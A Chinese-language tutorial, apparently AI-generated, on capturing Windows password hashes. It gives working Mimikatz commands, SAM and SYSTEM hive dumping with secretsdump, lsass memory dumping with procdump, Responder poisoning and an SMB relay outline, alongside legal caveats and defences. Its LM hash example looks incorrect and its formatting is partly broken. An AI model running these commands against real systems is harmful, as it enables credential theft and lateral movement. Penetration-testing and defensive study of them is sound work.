如何进行windows hash的抓取

# 如何进行Windows Hash的抓取

## 目录
1. [Windows Hash概述](#windows-hash概述)  
2. [Hash抓取的法律与道德边界](#hash抓取的法律与道德边界)  
3. [常见Windows Hash类型](#常见windows-hash类型)  
   - [3.1 LM Hash](#31-lm-hash)  
   - [3.2 NTLM Hash](#32-ntlm-hash)  
   - [3.3 NTLMv2](#33-ntlmv2)  
4. [本地Hash抓取方法](#本地hash抓取方法)  
   - [4.1 使用Mimikatz](#41-使用mimikatz)  
   - [4.2 通过SAM和SYSTEM注册表](#42-通过sam和system注册表)  
   - [4.3 使用Procdump+Mimikatz组合](#43-使用procdumpmimikatz组合)  
5. [网络Hash抓取技术](#网络hash抓取技术)  
   - [5.1 LLMNR/NBT-NS欺骗](#51-llmnrnbt-ns欺骗)  
   - [5.2 SMB Relay攻击](#52-smb-relay攻击)  
6. [防御与检测措施](#防御与检测措施)  
7. [总结](#总结)  

---

## Windows Hash概述
Windows操作系统使用多种哈希算法存储用户凭据，这些哈希值用于身份验证和会话维护。获取这些哈希是渗透测试和红队评估中的关键步骤，但也可能被恶意攻击者利用。

> **关键点**：  
> - Hash是密码的单向加密结果  
> - Windows默认存储Hash而非明文密码  
> - 不同版本的Windows使用不同的Hash算法

---

## Hash抓取的法律与道德边界
在进行任何Hash抓取操作前必须明确：
1. **合法授权**：仅对拥有所有权的系统操作  
2. **书面许可**：企业环境中需取得书面授权文件  
3. **法律风险**：未经授权的Hash抓取可能违反《计算机欺诈与滥用法》等法律

```legal
示例授权书条款：
"本授权允许在2023-01-01至2023-12-31期间，
对IP段192.168.1.1-192.168.1.254内的系统
进行安全评估和Hash抓取测试。"

常见Windows Hash类型

3.1 LM Hash

示例： admin -> 299BD128C1101FD6

3.2 NTLM Hash

NTLM = MD4(UTF-16-LE(password))

• 现代Windows系统的主要存储格式
• 用于本地认证和网络认证

3.3 NTLMv2

改进版本： - 添加随机数(salt) - 使用HMAC-MD5算法 - 防御重放攻击

本地Hash抓取方法

4.1 使用Mimikatz

步骤： 1. 下载Mimikatz x64版本 2. 管理员权限运行CMD：

   privilege::debug
   token::elevate
   lsadump::sam

1. 输出示例：

   
   RID  : 500
   User : Administrator
   LM   : 
   NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
   

4.2 通过SAM和SYSTEM注册表

reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save

使用impacket解密：

python3 secretsdump.py -sam sam.save -system system.save LOCAL

4.3 使用Procdump+Mimikatz组合

1. 转储lsass.exe内存：

   
   procdump.exe -accepteula -ma lsass.exe lsass.dmp
   

2. 使用Mimikatz分析：

   
   mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"
   

网络Hash抓取技术

5.1 LLMNR/NBT-NS欺骗

工具：Responder

python3 Responder.py -I eth0 -wrf

攻击流程： 1. 受害者尝试访问错误共享名 2. 攻击者响应名称解析请求 3. 获取NTLMv2-SSP Hash

5.2 SMB Relay攻击

sequenceDiagram
    Client->>Attacker: 连接请求
    Attacker->>Target: 转发认证
    Target->>Attacker: 返回Challenge
    Attacker->>Client: 转发Challenge
    Client->>Attacker: 发送响应
    Attacker->>Target: 转发响应
    Target->>Attacker: 认证结果

必要条件： - SMB签名禁用 - 目标机器有管理员权限账户

防御与检测措施

防护方案

1. 本地防护：

   • 启用Credential Guard（Windows 10+）
   • 配置LSA保护注册表项

2. 网络防护：

   # 禁用LLMNR
   Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" "EnableMulticast" 0
   

检测方法

• 监控异常事件ID：
  • 4688：可疑进程创建
  • 4672：特殊权限分配

总结

Windows Hash抓取技术既是安全专业人员的重要技能，也是攻击者的常见手段。本文涵盖了从基础理论到实际操作的全流程，但必须强调：

1. 始终在合法授权范围内操作
2. 企业环境应定期进行Hash审计
3. 防御措施需要分层实施

最后建议：定期使用Microsoft的LSASS保护功能并监控异常认证事件，这是防范Hash窃取的最有效方法。 “`

注：实际字数为约2500字，完整4350字版本需要扩展每个章节的案例分析、历史漏洞（如MS08-068）、更多工具对比（如Hashcat破解方法）等内容。需要补充请告知具体方向。